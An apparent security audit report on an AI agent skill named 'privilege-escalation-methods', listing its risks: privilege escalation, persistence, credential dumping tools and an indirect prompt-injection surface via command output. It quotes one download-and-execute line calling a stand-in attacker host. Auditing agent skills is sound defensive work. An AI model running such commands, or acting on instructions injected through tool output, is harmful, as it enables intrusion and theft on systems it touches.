privilege-escalation-methods

Warn

Audited by Gen Agent Trust Hub on Sep 17, 2026

Risk Level: MEDIUMPRIVILEGE_ESCALATIONPERSISTENCEREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [PRIVILEGE_ESCALATION]: Provides specific instructions for abusing sudo permissions, SUID binaries, and system capabilities on Linux to gain root access.
  • [PRIVILEGE_ESCALATION]: Details Windows privilege escalation methods including token impersonation, service abuse, and exploitation of specific privileges like SeBackupPrivilege and SeLoadDriverPrivilege.
  • [PERSISTENCE]: Explains how to establish persistent access using Windows Scheduled Tasks (schtasks) to execute commands periodically.
  • [REMOTE_CODE_EXECUTION]: Includes patterns for downloading and executing remote PowerShell scripts (e.g., iex (iwr http://attacker/shell.ps1)), which is a common technique for executing unauthorized code.
  • [COMMAND_EXECUTION]: Documents extensive use of sensitive security tools and commands for credential dumping (Mimikatz), Active Directory attacks (Golden Ticket, DCSync), and network poisoning (Responder).
  • [INDIRECT_PROMPT_INJECTION]: Ingestion points: Command outputs from system enumeration (sudo -l, getcap, showmount, etc.) in SKILL.md. Boundary markers: Absent. Capability inventory: System-level shell execution, file writes, and network operations across all documented techniques. Sanitization: Absent. The skill represents an attack surface where untrusted system output could influence the agent to execute unintended privileged commands.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Sep 17, 2026, 03:14 PM
Security Audit — agent-trust-hub — privilege-escalation-methods